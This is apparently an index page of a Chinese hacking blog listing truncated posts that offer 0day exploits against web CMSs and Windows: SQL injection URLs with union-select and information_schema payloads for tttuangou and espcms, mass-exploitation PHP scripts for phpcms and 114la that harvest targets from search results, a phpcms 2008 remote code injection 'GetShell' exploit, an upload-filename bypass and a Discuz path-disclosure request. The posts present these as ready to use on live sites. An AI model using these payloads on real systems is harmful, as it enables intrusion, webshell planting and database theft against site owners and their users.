刚刚捞到的提权0DAY,亲测2K3成功.

分类:工具 | 2013-06-30 | 撸过 1,706 次
7人扯谈

不多说 上图:

windows 提权0day

windows 提权0day[......]

继续阅读

ThinkPHP 2.1 漏洞可拿webshell

分类:安全 | 2012-08-23 | 撸过 3,519 次
0人扯谈

这个0day是一个月前爆出来的,为什么我今天说呢,因为今天我遇到了一个学弟用这个带漏洞的系统改框架码代码,他是去年用这套系统为西电写的网络攻防大赛的主页,那个时候0day还没爆出,所以网站一直幸免于难,但是,最近西电又要举办一次网络攻防大赛了,他还是用这套系统,那我就要义不容辞的上它了   嗷哈哈

晚上他和我聊  要我出比赛的有关题目  然后扔了个连接给我

我看了下  系统还是以前的那个thinkphp 2.1的版本

我们来分析下漏洞

官方发布了一个安全补丁

表述是:该URL安全漏洞会造成用户在客户端伪造URL,执行非法代码。

官方的补丁:

/trunk/ThinkPHP/[......]

继续阅读

phpcms-exp 0day

分类:安全 | 2012-03-9 | 撸过 822 次
0人扯谈
<?php
error_reporting(E_ERROR);
set_time_limit(0);

$keyword=’inurl:about/joinus’ ; // 批量关键字
$timeout = 1;
$stratpage = 1;
$lastpage = 10000000;
for ($i=$stratpage ; $i<=$lastpage ; $i++ ){
$array=ReadBaiduList($keyword,$timeout,$i);
foreach ($array as $url ){
$url_list=file(‘url.txt’);
if (in[......]

继续阅读

天天团购最新0DAY及爆路径利用

分类:安全 | 2012-01-28 | 撸过 389 次
0人扯谈

暴路径:

https://www.webshell.cc/modules/admin/tttuangou.mod.php

利用:

https://www.webshell.cc/index.php?mod=account&code=Sendcheckmail&uname=aaa%2527%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,[......]

继续阅读

espcms最新注入0day

分类:安全 | 2011-12-2 | 撸过 459 次
0人扯谈

上EXP。一步步来。暴出表前缀后,在修改后两句代码里面的表前缀。

爆表前缀:

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from informati[......]

继续阅读

phpcms 2008最新0day加批量EXP

分类:安全 | 2011-11-3 | 撸过 1,027 次
2人扯谈

玩滥了,丢给大家玩吧。现在命中率还不错哦。直接GETSHELL。一句话密码为c

EXP:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
PHPCMS Remote Code Inject GetShell Exploit
Google Dork:Powered by Phpcms 2008
code by secr
+-------------------------------------------------[......]

继续阅读

SiteServer 3.4.4最新SQL注入0day

分类:安全 | 2011-10-27 | 撸过 360 次
0人扯谈

这几天在看一个站的时候发现了这个CMS,网上公布了一些漏洞,没说明具体版本,

但在我在3.4.4上实际测试的时候发现是无效的,为此专门去官网下了一份最新版,

看了一下,发现了一些很搞笑的问题。简介siteserver:本文测试的版本是:

SiteServer系列产品最新版本: 3.4.4 正式版 (2011年7月18日发布)

下载地址:http://www.siteserver.cn/download客户案例:http://www.siteserver.cn/customer

也百度了一下,发现客户数量还是不少的。

漏洞描述:问题出在UserCenter.Pages.DLL中的Re[......]

继续阅读

风讯dotNETCMS 0day

分类:安全 | 2011-10-14 | 撸过 361 次
0人扯谈

漏洞出在用户页面,注册个用户。文章管理,上传。。选择文件名不变....

上传1.asp;,jpg

然后你们懂的

DZ 7.2最新版爆路径0day

分类:安全 | 2011-09-25 | 撸过 529 次
0人扯谈

这里只是说下方法,在要爆DZ 7.2 bbs的网站后面加上以下代码访问,即可爆出。"manyou/admincp.php?my_suffix=%0A%0DTOBY57",引号不算。

例如:http://www.webshell.cc/manyou/admincp.php?my_suffix=%0A%0DTOBY57

114啦注入0day批量

分类:安全 | 2011-09-7 | 撸过 345 次
0人扯谈
<?php
$sbcopyright='
----------------------------------------
114la feedback injection Vul Exploit
By xZL
Team: www.0kee.com
2011.04.02

Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' 127.0.0.1 /
----------------------------------------
';
if ($argc < 3) {
print_r($sbcopyright);[......]

继续阅读

第 1 页,共 2 页12